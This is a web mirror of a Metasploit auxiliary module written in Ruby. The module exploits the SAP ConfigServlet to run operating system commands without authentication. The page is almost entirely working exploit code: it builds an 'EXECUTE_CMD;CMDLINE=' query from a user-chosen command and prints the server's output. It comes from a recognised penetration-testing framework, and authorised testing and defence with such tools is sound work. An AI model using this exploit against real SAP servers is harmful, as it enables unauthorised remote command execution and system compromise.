CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'            => 'SAP ConfigServlet OS Command Execution',

12
      'Description'     => %q{

13
          This module allows execution of operating system commands through the SAP

14
        ConfigServlet without any authentication.

15
      },

16
      'Author'          =>

17
        [

18
          'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)

19
          'Andras Kabai' # Metasploit module

20
        ],

21
      'License'         => MSF_LICENSE,

22
      'References'      =>

23
        [

24
          [ 'OSVDB', '92704' ],

25
          [ 'EDB', '24963' ],

26
          [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']

27
        ],

28
      'DisclosureDate' => '2012-11-01' # Based on the reference presentation

29
    ))

30


31
    register_options(

32
      [

33
        Opt::RPORT(50000),

34
        OptString.new('CMD', [ true, 'The command to execute', 'whoami']),

35
        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])

36
      ])

37
  end

38


39
  def run

40
    begin

41
      print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])

42
      uri = normalize_uri(target_uri.path, 'ConfigServlet')

43


44
      res = send_request_cgi(

45
        {

46
          'uri' => uri,

47
          'method' => 'GET',

48
          'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])

49
        })

50
      if !res or res.code != 200

51
        print_error("#{rhost}:#{rport} - Exploit failed")

52
        return

53
      end

54
    rescue ::Rex::ConnectionError

55
      print_error("#{rhost}:#{rport} - Failed to connect to the server")

56
      return

57
    end

58


59
    if res.body.include?("Process created")

60
      print_good("#{rhost}:#{rport} - Exploited successfully\n")

61
      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")

62
      print_line("#{rhost}:#{rport} - Output: #{res.body}")

63
    else

64
      print_error("#{rhost}:#{rport} - Exploit failed")

65
      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")

66
    end

67
  end

68
end

69


70